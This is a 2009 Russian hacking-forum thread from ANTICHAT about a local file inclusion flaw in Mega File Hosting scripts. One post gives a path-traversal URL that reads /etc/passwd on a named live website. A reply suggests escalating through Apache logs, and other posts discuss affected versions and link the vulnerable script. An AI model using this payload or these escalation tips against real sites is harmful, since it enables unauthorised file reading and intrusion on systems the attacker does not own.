HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 18.03.2009, 01:50
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
По умолчанию

эксплуатировать эту работает хорошо на локальный файл включения

http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00

Не взломать этот сайт!!!
 
Ответить с цитированием

  #12  
Старый 18.03.2009, 01:53
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
С нами: 11478626

Репутация: 112
По умолчанию

Powered by: MFH v1.2 катит

Powered by: MFH v2.0 не катит
 
Ответить с цитированием

  #13  
Старый 18.03.2009, 01:54
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
По умолчанию

jokester
Основателем этого является ошибка: garry

it's Me

kysmi4

da это правда

Последний раз редактировалось GarryCka; 18.03.2009 в 01:57..
 
Ответить с цитированием

  #14  
Старый 18.03.2009, 01:59
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от GarryCka  
эксплуатировать эту работает хорошо на локальный файл включения

http://allshares.ge/cross.php?url=../../../../../../../../etc/passwd%00

Не взломать этот сайт!!!
Бред =\
1) Через логи апача
2) Найти реальный путь и читать файлы в поисках
 
Ответить с цитированием

  #15  
Старый 18.03.2009, 02:00
kyzmi4
Участник форума
Регистрация: 19.07.2004
Сообщений: 135
С нами: 11478626

Репутация: 112
По умолчанию

А зачем тогда писать для все версий?
 
Ответить с цитированием

  #16  
Старый 18.03.2009, 02:06
GarryCka
Новичок
Регистрация: 11.03.2009
Сообщений: 7
С нами: 9035818

Репутация: 2
По умолчанию

kyzmi4
sorry it's my error!

http://milw0rm.com/exploits/8230
 
Ответить с цитированием

  #17  
Старый 18.03.2009, 02:09
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
С нами: 9610769

Репутация: 380
По умолчанию

Цитата:
Сообщение от kyzmi4  
Powered by: MFH v1.2 катит

Powered by: MFH v2.0 не катит
Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.
 
Ответить с цитированием

  #18  
Старый 18.03.2009, 02:20
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от PaCo  
Я как понимаю у тебя есть MFH v1.2 выложи плиз а то погугли и так и не нашел, хочеться посмотреть что там, мне так кажеться если нет курлов то он через file_get_contets с stream_context_create читает файлы.
Поправил свой пост с кодом.

кому интересно

http://depositfiles.com/ru/files/qq80v50yg/
Mega_File_Hosting_Script_v1.1

Последний раз редактировалось jokester; 18.03.2009 в 11:37..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Live CD для сисадминов xcedz Для Администратора 21 13.09.2009 22:46
Проблемы с Записью Cd-R Nova "Железо" 17 14.03.2009 17:59
Вопрос по логам An90 Linux, Freebsd, *nix 6 08.02.2009 18:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.